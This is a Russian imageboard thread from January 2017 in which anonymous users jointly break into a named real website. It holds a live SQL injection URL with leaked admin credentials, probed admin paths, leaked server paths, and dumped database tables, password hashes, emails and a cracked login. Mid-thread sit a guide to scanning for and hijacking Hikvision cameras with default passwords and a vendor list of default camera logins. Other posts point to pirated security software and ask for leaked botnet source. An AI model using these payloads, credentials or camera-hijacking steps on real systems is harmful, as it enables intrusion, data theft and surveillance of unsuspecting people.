[Ответить в тред] Ответить в тред

02/12/16 - Конкурс визуальных новелл доски /ruvn/
15/11/16 - **НОВЫЙ ФУНКЦИОНАЛ** - Стикеры
09/10/16 - Открыта доска /int/ - International, давайте расскажем о ней!


Новые доски: /2d/ - Аниме/Беседка • /wwe/ - WorldWide Wrestling Universe • /ch/ - Чатики и конфочки • /int/ - International • /ruvn/ - Российские визуальные новеллы • /math/ - Математика • Создай свою

[Назад][Обновить тред][Вниз][Каталог] [ Автообновление ] 175 | 8 | 26
Назад Вниз Каталог Обновить

Аноним 16/01/17 Пнд 17:08:31  144622431  
14844965832760.jpg (28Кб, 720x460)
Пасаны, тут в общем такое дело...

admin:admin
pass:kidsdict
http://www.bible-history.com

Как обнаружилось, спросите вы?

http://www.bible-history.com/subcat.php?id=-23%20union%20select%20concat%28table_name,0x3a,column_name,0x3a,table_schema%29+from+information_schema.columns+where+column_name+LIKE+CHAR
(37, 112, 97, 115, 37)

Только вот админку никто не смог найти даже из забугорных кулхацкеров. А сможешь ли ты?
Аноним 16/01/17 Пнд 17:09:01  144622469
BUMP
Аноним 16/01/17 Пнд 17:09:50  144622539
BUMP
Аноним 16/01/17 Пнд 17:11:00  144622613
BUMP
Аноним 16/01/17 Пнд 17:11:21  144622638
Это вам не по ftp с открытыми портами гулять
Аноним 16/01/17 Пнд 17:13:17  144622763
>>144622431 (OP)
Забугорным хакерам не приходило в голову, что админка может быть прикрыта для определенных IP при помощи htaccess?
Аноним 16/01/17 Пнд 17:14:20  144622850
>>144622763
мое дело принести
Аноним 16/01/17 Пнд 17:15:07  144622900
>>144622763
странно, что о сокрытии позаботились, а про то, что пассы админа находятся при простом вбивании sql или при поиске(!) по сайту - нет
Аноним 16/01/17 Пнд 17:25:24  144623608
ВЗЛОМ КАМЕР ТРЕД #1 ВОЗРОЖДЁННЫЙ

Скачиваем iVMS-4200 - https://hikvision.ru/?q=download-client
Скачиваем VNC сканер - http://rgho.st/7756FhBQK
Скачиваем Hikka - http://rgho.st/8HGpXTkjD

ИНСТРУКЦИЯ:

1. Скачиваем и устанавливаем iVMS-4200, с его помощью мы сможем просматривать камеры.
2. Создаем отдельную папку для нашего VNC и запускаем его. Ищем диапазоны IP и вставляем в большое окно программы. Искать диапазоны можно на этом сайте - https://4it.me/ . Далее, вписываем порт 8000 и нажимаем на кнопку "Start scan" , ждёте пока IP найдутся и закрываете консоль, далее нажимаете на кнопку "Start parser" и закрываете программу. ДАЛЕЕ, копируете IP из IPs.txt и вставляете в файл hosts который находится в папке Hikka, в папке хикка будет файл Start.bat, жамкаете на него и у вас открывается консоль, далее программа сама прочекает IP адреса на admin:12345 и результат вашего труда вы увидите в папке pics.
3. Запускаем программу iVMS-4200 и вводим данные для входа в камеру.
Аноним 16/01/17 Пнд 17:25:49  144623636
теперь это уязвимостей трендж
Аноним 16/01/17 Пнд 19:03:27  144630039
>>144623636
УУУУУУУУУУУУУУУУУУУУУУХАКЕРОВТРЕНДЖ
НАКОНЕЦТА
Аноним 16/01/17 Пнд 19:20:05  144631115
>>144623608
Пидоры из /web опять вылезли.
Аноним 16/01/17 Пнд 19:34:34  144632139
>>144622431 (OP)
нашел
Аноним 16/01/17 Пнд 19:36:07  144632235
>>144632139
пали?
Аноним 16/01/17 Пнд 19:37:23  144632315
>>144632235
дирбом пройдись
dirb
Аноним 16/01/17 Пнд 19:38:48  144632408
>>144632235
как сам полажу выложу свои логи скана
Аноним 16/01/17 Пнд 20:11:49  144634837
>>144632235
похакану всем кому не лень, хуета
Аноним 16/01/17 Пнд 20:12:05  144634854
>>144634837
похакана*
Аноним 16/01/17 Пнд 20:55:22  144638176
>>144634854
>>144634837
ну так размести Абу на главной, плез. Почему её похакали, но не дефейсили?
Аноним 16/01/17 Пнд 21:03:09  144638810
>>144638176
потому что нахуя?
ради лулзов?
что бы потом удалили такое отличное научное пособие идиотизма в безопасности?
Аноним 16/01/17 Пнд 21:07:40  144639150
>>144638810
таких пособий весь гугл доркс пестрит, о чём ты?
Аноним 16/01/17 Пнд 21:09:08  144639260
>>144622900
Чтобы патралеть хакиров-аметистов.
Алсо нахуя этому сайту админка? Что это за cms такая?
Аноним 16/01/17 Пнд 21:09:13  144639270
>>144622431 (OP)
Давайте посоны,ломайте.
Представимся игиловцами, под руководством Макак Абу ибн Сосач.
Разместим нашиды
Аноним 16/01/17 Пнд 21:10:23  144639351
>>144639260
ты думаешь, что все сайты работают только на cms? ты из поколения, где сайты делают на wix и wp?
Аноним 16/01/17 Пнд 21:13:20  144639562
Чтобы хоть как-то заставить пользователей и админов защитить оборудование от хакеров, на сетевых ресурсах нередко публикуют перечни логинов/паролей по умолчанию для наиболее популярных марок оборудования. Наиболее полный список для сетевых камер видеонаблюдения на данный момент выглядит следующим образом (login/password):

ACTi: admin/123456 либо Admin/123456
American Dynamics: admin/admin либо admin/9999
Arecont Vision: отсутствует
Avigilon: admin/admin
Axis: обычно root/pass; в новых камерах при первом входе требуется задание пароля
Basler: admin/admin
Bosch: отсутствует
Brickcom: admin/admin
Canon: root/camera
Cisco: по умолчанию пароль отсутствует, но при первом входе требует задания
Dahua: admin/admin
Digital Watchdog: admin/admin
DRS: admin/1234
DVTel: Admin/1234
DynaColor: Admin/1234
FLIR: admin/fliradmin
Foscam: admin/<пробел>
GeoVision: admin/admin
Grandstream: admin/admin
Hikvision: admin/12345
Honeywell: admin/1234
IQinVision: root/system
IPX-DDK: root/admin либо root/Admin
JVC: admin/jvc
March Networks: admin/<пробел>
Mobotix: admin/meinsm
Panasonic: admin/12345
Pelco Sarix: admin/admin
Pixord: admin/admin
Samsung Electronics: root/root либо admin/4321
Samsung Techwin: admin/1111111 (старые модели), admin/4321 (новые модели)
Sanyo: admin/admin
Scallop: admin/password
Sentry360 (mini): admin/1234
Sentry360 (pro): отсутствует
Sony: admin/admin
Speco: admin/1234
Stardot: admin/admin
Starvedia: admin/<пробел>
Trendnet: admin/admin
Toshiba: root/ikwd
VideoIQ: supervisor/supervisor
Vivotek: root/<пробел>
Ubiquiti: ubnt/ubnt
Wodsee: admin/<пробел>
Аноним 16/01/17 Пнд 21:14:04  144639621
>>144639562
нет, это не стандартный пароль, но спасибо за базу
Аноним 16/01/17 Пнд 21:14:15  144639637
>>144639351
Так нах ещё админка на сайте нужна. Либо cms, либо прямо на сервере сайт меняй.
Аноним 16/01/17 Пнд 21:14:35  144639667
>>144639150
ладно, ты прав
Аноним 16/01/17 Пнд 21:15:28  144639747
14825036155580.webm (4421Кб, 640x360, 00:02:57)
Добавьте чтобы на фоне музыка играла.
Аноним 16/01/17 Пнд 21:16:30  144639820
>>144639747
лучше что то тематическое, про сатану
Аноним 16/01/17 Пнд 21:17:11  144639868
блять, везде 500
кривовкось все
Аноним 16/01/17 Пнд 21:18:19  144639939
Анон, раз уж такой тред, спрошу. А Абу не может на нормальный ssl разориться или что? Есть какие-то профиты этого бесплатного говна на 3 месяца?
Аноним 16/01/17 Пнд 21:18:53  144639976
>>144639820
Можно что в духе: Добрались до Детройта, доберемся и до России. Слава Сатане. Абу Слава.
https://www.youtube.com/watch?v=0r7mb4kj88w
Аноним 16/01/17 Пнд 21:19:04  144639990
>>144639939
так ему интереснее видно
Аноним 16/01/17 Пнд 21:19:26  144640021
>>144639939
Так-то был нормальный ссл, но после покупки мейл.ру что-то пошло не так.
Аноним 16/01/17 Пнд 21:23:27  144640326
>>144640021
неспростажж
ключи шифрования интернета небось легче так передавать
Аноним 16/01/17 Пнд 21:23:41  144640341
>>144639637
ftp
Аноним 16/01/17 Пнд 21:24:08  144640375
14845882241680.webm (4090Кб, 960x540, 00:00:20)
Аноним 16/01/17 Пнд 21:24:41  144640422
>>144640341
он там есть, ищу доступ
Аноним 16/01/17 Пнд 21:26:01  144640524
https://www.youtube.com/watch?v=op918vGvCMo
Аноним 16/01/17 Пнд 21:26:05  144640532
>>144640021
>но после покупки мейл.ру
Чего, блять?
Аноним 16/01/17 Пнд 21:27:02  144640614
>>144640532
не знал, лол?
Аноним 16/01/17 Пнд 21:27:21  144640636
>>144640422
http://www.bible-history.com/geography/admin/

Чекай
Аноним 16/01/17 Пнд 21:27:40  144640652
>>144640614
Мейлру купил харкач?
Аноним 16/01/17 Пнд 21:30:33  144640887
14780362535023.webm (2225Кб, 1296x720, 00:03:47)
>>144640652
Ты серьёзно? охуеть.
Аноним 16/01/17 Пнд 21:31:34  144640971
>>144640652
да
что то еще говорили про иичан
Аноним 16/01/17 Пнд 21:32:45  144641078
>>144640636
это квери для бд, херня
Аноним 16/01/17 Пнд 21:36:04  144641317
>>144640887
>>144640971
Ну охуеть теперь! Я правда не в курсе был. А давно, вообще?
Аноним 16/01/17 Пнд 21:36:21  144641341
>>144640422
ЯНАШЕЛ САСАЙТЕ !
ftp://54.201.8.54/
Аноним 16/01/17 Пнд 21:37:03  144641402
>>144641317
https://2ch.pm/abu/res/52038.html
Аноним 16/01/17 Пнд 21:38:19  144641499
>>144641341
у них даже такой домен был
Аноним 16/01/17 Пнд 21:38:27  144641512
>>144641402
Ебать я слоупок. Спасибо за инфу!
Аноним 16/01/17 Пнд 21:39:44  144641615
5VQucQrvP6s.jpg (271Кб, 1215x896)
>>144641341

Осторожно, вредоносное ПО!

Сайт 54.201.8.54 может установить на ваш компьютер вредоносное ПО, которое крадет или удаляет личную информацию (например, фотографии, пароли, сообщения и реквизиты банковских карт).
Аноним 16/01/17 Пнд 21:40:40  144641693
>>144641615
у них там ссш кстати
Аноним 16/01/17 Пнд 21:41:01  144641729
>>144641615
На самом деле я просто щкольник и наткнулся на эту пастебин-копипасту.
http://pastebin.com/z5YEizeT
Аноним 16/01/17 Пнд 21:42:11  144641806
E:\bholocal\Bho\htdocs\geography\admin\addcat.cfm
раскрытие путей
Аноним 16/01/17 Пнд 21:44:33  144641999
>>144641806
Ничего не дает .Да и вообще сайт последний раз в 2005 трогали
Аноним 16/01/17 Пнд 21:45:53  144642098
>>144641999
есть 2016 записи
Аноним 16/01/17 Пнд 21:47:03  144642180
Тут путь


http://www.bible-history.com/cfcache.map
Аноним 16/01/17 Пнд 21:48:44  144642310
>>144642180
И что это дает?
Аноним 16/01/17 Пнд 21:50:00  144642404
Ищи дурака за четыре сольдо.
Аноним 16/01/17 Пнд 21:50:29  144642449
>>144642310
стыдно не знать
Аноним 16/01/17 Пнд 21:52:16  144642632
>>144642449
Нит
Аноним 16/01/17 Пнд 21:58:55  144643131
База называется bible_history, если кому интересно
Аноним 16/01/17 Пнд 22:00:10  144643230
Почему именно этот сайт? Это какой-то хакирский мемас?
Аноним 16/01/17 Пнд 22:00:12  144643233
http://www.bible-history.com/piwik/
Аноним 16/01/17 Пнд 22:00:41  144643269
>>144643230
нет, рандомный почти сайт
Аноним 16/01/17 Пнд 22:01:41  144643356
14840634322493.jpg (44Кб, 556x800)
>>144622431 (OP)
Старые добрые sql инъекции. Ты словно перенес меня в мой 2007.
Аноним 16/01/17 Пнд 22:01:49  144643368
>>144643230
потому что он оказался одним из первых в поиске дорка, а потом, при проверке, оказался дыряв, как твоя ЕОТ
Аноним 16/01/17 Пнд 22:02:19  144643409
>>144643356
ты не поверишь, но они работают и 2017-ом. Добро пожаловать. Снова
Аноним 16/01/17 Пнд 22:03:15  144643476
>>144638810
>ради лулзов?
Почему бы нет? Дефейсы - это весело.
Аноним 16/01/17 Пнд 22:06:13  144643717
>>144643409
Но сегодня они уже практически неактуальны же. Если писать по последним стандартам php, так там в принципе такое явление, как инъекция, возникнуть не может. А остались они только в совсем уж старых движках.
Аноним 16/01/17 Пнд 22:06:40  144643750
>>144643368
ДЫРЯВ, КАК МОЯ ЕОТ, НО ПУТЬ К АДМИНКЕ ЕСТЬ ТОЛЬКО У ОДНОГО, АЗАЗА!
Аноним 16/01/17 Пнд 22:07:04  144643783
>>144643717
сайт 2000-2005 года, что с него взять
Аноним 16/01/17 Пнд 22:09:38  144643959
>>144643717
миллион сайтов висит с давних времен и не переписывалось. Просто проверь стандартный дорк .php?=id

И втыкай в любой SQL. Пожалуй, все поддадутся.
Аноним 16/01/17 Пнд 22:09:51  144643976
а это уже интересно
http://www.bible-history.com/123/
Аноним 16/01/17 Пнд 22:10:51  144644045
>>144643959
дляэтого уже есть скриптики которые сами по доркам набирают сайтецы и сплойтят
Аноним 16/01/17 Пнд 22:11:54  144644130
>>144643976
ладно, это какая то хуевая заготовка
Аноним 16/01/17 Пнд 22:12:03  144644142
>>144643976
>http://www.bible-history.com/123/
нихуя
Аноним 16/01/17 Пнд 22:12:55  144644215
http://www.bible-history.com/quiz/admin/

2 минуты поиска
Аноним 16/01/17 Пнд 22:12:57  144644218
>>144643959
Да хер там, сейчас это не актуально. А в свое время, как раз в году 2007, я на этом таки поднял деньжат немного.
Аноним 16/01/17 Пнд 22:13:44  144644276
>>144644215
хуйня, ищи заного
Аноним 16/01/17 Пнд 22:14:20  144644331
>>144644215
нет. это не то, дурачок. Это квиз. Квиз - это типа тест. Так что не умничай. Админ квиза - это хуета. Это типа тебе позволят создать свой квиз и всё, сайт тебе никто не даст в ручки
Аноним 16/01/17 Пнд 22:14:59  144644379
>>144644218
легалом? продавал инфу про уязвимости? Или нелегал и лил шеллы, пиздил пассы, сливал кредитки?
Аноним 16/01/17 Пнд 22:15:34  144644424
>>144644379
>нелегал и лил шеллы
this. Тысячами.
Аноним 16/01/17 Пнд 22:16:11  144644481
ладно, впизду
вот вам что нашел, ломайте, думаю это и есть админка
мне впадлу брутить
http://www.bible-history.com/_private
http://www.bible-history.com/admin1/admin.php
Аноним 16/01/17 Пнд 22:19:43  144644740
Как, кроме sql инъекций, можно получить доступ к сайту?
Аноним 16/01/17 Пнд 22:22:03  144644926
>>144644740
через твою мамку
тысячи способов, или ты об этом сайте?
Аноним 16/01/17 Пнд 22:22:19  144644944
>>144644481
ну, нашли что то, дорогие мои?
Аноним 16/01/17 Пнд 22:23:29  144645032
>>144644944
сюда пасс не подходит
Может, дело в логине? ни bho, ни admin не идут
Аноним 16/01/17 Пнд 22:24:58  144645147
>>144645032
Да там скорее всего та админка с базой и не связана вовсе, а пароль жестко прописан в php файле.
Аноним 16/01/17 Пнд 22:25:55  144645220
>>144645032
думаю №144645147-анон прав
в базе есть еще пара паролей
Аноним 16/01/17 Пнд 22:28:20  144645397
>>144645220
Можно попробовать залить файл через инъекцию. Маловероятно, конечно, что сработает, но хер его знает.
Сейчас и не вспомню уже команд, давно я этим не баловался. Может погуглю сейчас да попробую.
Аноним 16/01/17 Пнд 22:29:22  144645469
>>144644481
> http://www.bible-history.com/_private
Кидает 500 при первой же попытке логина логин и пароль не из оп-поста и не дает разлогиниться ввести заново. ЧЯДНТ?
Аноним 16/01/17 Пнд 22:30:23  144645546
>>144645397
Вангую, что сработает, лей
Аноним 16/01/17 Пнд 22:31:57  144645664
>>144622763
Админка у Господа, алло!
Аноним 16/01/17 Пнд 22:32:27  144645704
>>144645546
Не, не сработало. Права настроены.
Query failed : Access denied for user 'bho'@'localhost' (using password: YES)
Аноним 16/01/17 Пнд 22:32:56  144645734
>>144645397
это и делаю все это время
вы вручную блять делаете все?
рили?
Аноним 16/01/17 Пнд 22:33:25  144645764
>>144645704
а куда лил?
Аноним 16/01/17 Пнд 22:33:51  144645791
>>144645734
Вручную конечно. Такое только вручную и делается.
Аноним 16/01/17 Пнд 22:34:35  144645847
>>144645764
Я без пути указал, просто файл, по идее должно было прокатить. Может там от корня указывать надо, но путь от корня я не знаю.
Аноним 16/01/17 Пнд 22:34:40  144645852
>>144645791
на дворе 21 век
как минимум burpsuite
а вообще есть автоматические утилиты
Аноним 16/01/17 Пнд 22:35:16  144645900
>>144645852
Впервые слышу, никогда такими не пользовался.
Аноним 16/01/17 Пнд 22:35:24  144645917
>>144645847
нет,просто в ту папку закрыта запись
я бручу куда можно лить пока
тут нам и пригодяться слитые пути внутри фс
Аноним 16/01/17 Пнд 22:36:05  144645967
>>144645900
поставь тогда как все тру-хакеры линукс или кали, и запусти sqlmap, ахуеешь
он
Аноним 16/01/17 Пнд 22:36:20  144645985
>>144645917
У тебя есть пути? Где нарыл? Скинь или скажи хотя бы, как нашел.
Аноним 16/01/17 Пнд 22:39:20  144646192
>>144645985
вверху в треде смотри
но прикол в чем
пути слиты с вебсерва
а нам нужны пути в бд
а это могут быть разные машины
баннер на тебе
web application technology: Apache 2.4.23, PHP 5.5.38
back-end DBMS: MySQL >= 5.0
banner: '5.5.51'

Аноним 16/01/17 Пнд 22:43:40  144646496
>>144646192
>а это могут быть разные машины
Хер там, это одна машина user 'bho'@'localhost'
Аноним 16/01/17 Пнд 22:44:42  144646552
>>144646496
то есть, где нашел?
Аноним 16/01/17 Пнд 22:45:33  144646608
>>144646552
При попытке записи в файл вывалило. >144645704
Аноним 16/01/17 Пнд 22:51:05  144646982
Не получится кароче залить. sql юзер не имеет права.
Там еще винда вообще, похоже, так, что никаких прав на папки нет.
Да, еще ssh порт открыт, если что. Может кто побрутить захочет.
Аноним 16/01/17 Пнд 22:51:51  144647027
>>144646982
неа, запрещено по паролям, только сертификаты похоже
Аноним 16/01/17 Пнд 22:52:38  144647084
>>144646608
ну так это имя@имямашиныбд
а с чего решил что это тот же юзер на вебсерве?
Аноним 16/01/17 Пнд 22:53:40  144647171
>>144647084
Чего? Sql cервер на той же машине стоит, вот я о чем.
Аноним 16/01/17 Пнд 22:54:19  144647222
>>144647171
с чего так решил? я просто запутался в твоих обьяснениях и не могу понять
Аноним 16/01/17 Пнд 22:55:52  144647330
>>144647222
Ну потому, что localhost написано же, ну емае. Если бы sql сервер был на другой машине, там был бы написан его адрес.
Аноним 16/01/17 Пнд 22:58:10  144647524
>>144647330
ноуп
смотри
ты пытаешь вписать в файл по пути "/pohui/etc/etc"(не учитываем что это венда) какой то бред
бд запрашивает доступ и шлется нахуй
и говорит что возникла ошибка у локального юзера
так что все окей
Аноним 16/01/17 Пнд 23:01:25  144647795
>>144647524
Ну хуй его знает, не проверял. Один хер, 99%, что база на этой же машине.
Аноним 16/01/17 Пнд 23:02:32  144647889
>>144647795
Запись в папки вебсерва не пашет?
А чтение?
может можешь админ.пхп прочиатть?
я ща попробую немного
Аноним 16/01/17 Пнд 23:04:01  144647989
>>144647889
Тоже нет.

http://www.bible-history.com/piwik/
Сюда надо копать. Может из админки этой аналитической херни можно будет что то сделать. Нужно только узнать, где в базе от нее пароли лежат.
Аноним 16/01/17 Пнд 23:13:12  144648740
>>144647989
есть сплойты даже на него, можно покопать их
Аноним 16/01/17 Пнд 23:15:35  144648914
>>144647989
нет в базе от него таблиц, там должно быть пободное
log_visit
Аноним 16/01/17 Пнд 23:15:52  144648936
>>144648914
может от рута они только доступны
Аноним 16/01/17 Пнд 23:24:31  144649565
>>144647989
Анон, тебя уже повязали?
или ты слился просто?
Аноним 16/01/17 Пнд 23:28:18  144649856
>>144649565
Да не, я тут. piwik же другую базу задействует, лол. Хер в нее попадешь.
Сейчас хочу вытащить имена таблиц из базы bible_history, может в статьи получится php внедрить.
Аноним 16/01/17 Пнд 23:29:44  144649965
>>144649856
у меня доступ к
[] bible_glossary
[
] bible_history
[] information_schema
[
] keywords
[*] kidsdict
есть...
Аноним 16/01/17 Пнд 23:30:55  144650064
>>144649965
Напомни, как делать запросы из других баз? Я за 10 лет все забыл, лол.
Аноним 16/01/17 Пнд 23:32:46  144650223
>>144650064
поставь скульмап и делай в нем,быстрее будет
а вообще вот
http://ru.stackoverflow.com/questions/53344/%D0%92%D1%8B%D0%B1%D0%BE%D1%80%D0%BA%D0%B0-%D0%B8%D0%B7-%D0%B4%D0%B2%D1%83%D1%85-%D0%B1%D0%B0%D0%B7-%D0%B7%D0%B0-%D0%BE%D0%B4%D0%B8%D0%BD-%D0%B7%D0%B0%D0%BF%D1%80%D0%BE%D1%81
Аноним 16/01/17 Пнд 23:33:56  144650321
>>144650064
слитые хешированные пароли
user_id,user_bio,user_pass,user_name,user_email,user_banned,user_regdate,user_numposts,user_timezone,user_bio_status,user_lastsession,user_newpassword,user_email_public,user_allowviewonline,user_lasttimereadpost
1,<blank>,a1fba67e72b37d0ba83c2cc937172ec8eb1fda6d,admin,[email protected],0,1115584099,1,2.0,1,1115647107,<blank>,0,1,1115647107
2,<blank>,b404bbb52c91fe1f291ba9c2719aa7d916dc55e5,Jim,[email protected],0,1115584767,1,2.0,5,1115585298,<blank>,0,1,1115585126
3,<blank>,3a5fbfe524ec4319455769d5462eb2c4ac4cbe79,rusty,[email protected],0,1167079798,1,2.0,5,1167079798,<blank>,0,1,1167079887
Аноним 16/01/17 Пнд 23:35:20  144650445
>>144650321
Откуда они?
Аноним 16/01/17 Пнд 23:36:56  144650553
>>144650445
atabase: bible_history
Table: bho_board_users
Аноним 16/01/17 Пнд 23:42:39  144650980
>>144650553
Все таблицы базы bible_history:
Нужно копать administrators

bible_ref
custom_questions
glossary
groups
kjv_verse
lookup
naves
question_comments
questions
questions_BACKUP
questions_copy
questions_import_test
words
Emails
administrators
bh_addform
bh_guestbook
bho_board_bans
bho_board_forums
bho_board_posts
bho_board_search
bho_board_topics
bho_board_users
bible_book
books
cat
categories
chapters
chapters1
commentary_jfb
eastons
guestbook
isbe
kingjames
Аноним 16/01/17 Пнд 23:43:18  144651023
>>144650980
jc:Mos3s
одна пара, и все
Аноним 17/01/17 Втр 00:08:27  144652959
Как успехи?
Аноним 17/01/17 Втр 00:09:57  144653059
никак, я пошел спать, есть намного более интересные сайты
я бы еще побрутил пути, а потом пробывал бы искать пхп места иньекции
но в пизду это
Аноним 17/01/17 Втр 00:15:45  144653421
слушайте, а скуэльмап же умел, вроде, сливать файлы с сервака?
Аноним 17/01/17 Втр 00:16:17  144653455
>>144653421
читай тред, поймешь почему не получается
Аноним 17/01/17 Втр 00:17:11  144653517
>>144653455
я понял, что у вас туда залить не получается
а оттуда слить тоже?
Аноним 17/01/17 Втр 00:19:11  144653651
>>144653517
не я пробывал
но скульмап похоже не дружит с путями венды, там же обратный слеш
Аноним 17/01/17 Втр 00:19:17  144653660
>>144653517
Тоже. Это вообще исключительный случай, чтобы через sql можно было бы что то слить или залить.
Аноним 17/01/17 Втр 00:20:07  144653712
>>144653660
на самом деле нет, и на соревнованиях, и в реальной жизни не раз было
Аноним 17/01/17 Втр 00:20:46  144653763
го может в тлг/ирку/джаббер перекатимся?
Аноним 17/01/17 Втр 00:20:58  144653771
>>144653712
Значит просто мне не попадалось.
Аноним 17/01/17 Втр 00:21:23  144653799
>>144653763
Можно. Интересно всетаки будет закончить.
Аноним 17/01/17 Втр 00:21:25  144653804
>>144653763
тоже думал, что для этого надо?
есть тг акк
Аноним 17/01/17 Втр 00:25:02  144654030
>>144653804
Создать группу в телеграме.
Аноним 17/01/17 Втр 00:25:15  144654043
>>144653763
сколько нас тут вообще?
я >>144644481
,>>144632139-кун
Аноним 17/01/17 Втр 00:25:58  144654090
БЛЯДЬ ОП ТЫ ЧО ДУРАК
http://www.bible-history.com/quiz/admin/setup.php
http://www.bible-history.com/geography/admin/
Аноним 17/01/17 Втр 00:26:11  144654100
>>144654030
давайте ники
Аноним 17/01/17 Втр 00:26:22  144654114
https://t.me/joinchat/AAAAAAvFN2b-R98PPUPJ-A
Аноним 17/01/17 Втр 00:27:53  144654211
Бля объясните в чем суть?
Аноним 17/01/17 Втр 00:28:09  144654231
>>144654043
я еще
Аноним 17/01/17 Втр 00:30:39  144654378
>>144654211
ломаем сайтец, четы
Аноним 17/01/17 Втр 00:36:29  144654697
FBSQLiPoC.jpg (280Кб, 988x742)
>>144643717
Да ты что, правда чтоле? За эту скулю мне заплатили 500 баксов, из-за того, что домен не в рамках программы. А так, срубил бы штук 10, эх.

мимо_успешный_багхантер
Аноним 17/01/17 Втр 00:37:36  144654763
Админ на Небе
Аноним 17/01/17 Втр 00:39:07  144654855
>>144654697
Расскажи как стал, как научился
Аноним 17/01/17 Втр 00:39:41  144654887
>>144654697
бля, молодчина
бурпсут, красава
есть лицуха кстати?
Аноним 17/01/17 Втр 00:41:48  144655014
>>144654855
Я давно собирался запилить тред для >анонов по этой теме, на ночном, но все лень.

В кратце, как я начинал, гуглишь топ уязвимостей по OWASP и каждую разбираешь, гуглишь по ним статьи.

Начинай с XSS, SQLi, RFI/LFI, path traversal. Это самые часто встречающиеся и легко детектящиеся уязвимости, кторые актуальны и по сей день везде. Даже в гугле.
Аноним 17/01/17 Втр 00:42:43  144655067
>>144655014
бля, приходи к нам в уютный чатик. https://t.me/joinchat/AAAAAECdwLriLV2EP0Eg_A
Аноним 17/01/17 Втр 00:42:59  144655076
>>144654114
ссылка протухла
https://t.me/joinchat/AAAAAECdwLriLV2EP0Eg_A
Аноним 17/01/17 Втр 00:43:08  144655087
>>144654887
В инете нагугли лоадер на год, дело 5 минут, я просто уже забыл откуда скачивал.
Аноним 17/01/17 Втр 00:43:47  144655122
>>144655076
А что вы там обсуждаете то? Какая тематика?
Аноним 17/01/17 Втр 00:44:00  144655132
>>144655087
можешь точнее описать пожалуйста?
Аноним 17/01/17 Втр 00:44:05  144655138
>>144655087
Недавно его выложили, на рдоте вроде есть точно.
Аноним 17/01/17 Втр 00:44:56  144655187
>>144655132
google: site:rdot.org burp suite

Там ветка была на форуме, и там выложили лоадер и сам бурп с лицензией на год.
Аноним 17/01/17 Втр 00:45:09  144655194
>>144622431 (OP)
ЛОЛ!
Вчера владельцу сайта написал на почту о дыре.
Аноним 17/01/17 Втр 00:45:36  144655216
>>144655187
спасибо большое
Аноним 17/01/17 Втр 00:45:56  144655229
>>144655194
в базе на его же сайте полно комментов о том что сайт дырявый как портовая шлюха
Аноним 17/01/17 Втр 00:47:03  144655283
Вступайте в сат[...].webm (7382Кб, 540x360, 00:01:50)
>>144639270
Хуиловцами представься. Надо славить Сотону!
Аноним 17/01/17 Втр 00:49:29  144655418
>>144655122
>А что вы там обсуждаете то? Какая тематика?
Сайтик ломаем, лол.
Аноним 17/01/17 Втр 00:54:09  144655707
>>144655418
Не сорян, вы хуйней занимаетесь, если честно. Таких ноунейм сайтов, нахуй не нужных никому, даже админу, уязвимых к скулям, я в гугле сотню найду по простейшим гуглдоркам.
Аноним 17/01/17 Втр 00:57:44  144655954
>>144640524
>>144655283
Аноним 17/01/17 Втр 02:40:58  144660507
она утонула
Аноним 17/01/17 Втр 03:04:25  144661313
Ребят, подкиньте сурцы ragebot который недавно слили в сеть. Я знаю, у вас есть доступ к андеграундным форумам. Прошу, уж очень заинтересовал.
Аноним 17/01/17 Втр 03:18:19  144661732
>>144660507
и всплыла
Аноним 17/01/17 Втр 03:44:28  144662530
опа

[Назад][Обновить тред][Вверх][Каталог] [Реквест разбана] [Подписаться на тред] [ ] 175 | 8 | 26
Назад Вверх Каталог Обновить

Топ тредов
Избранное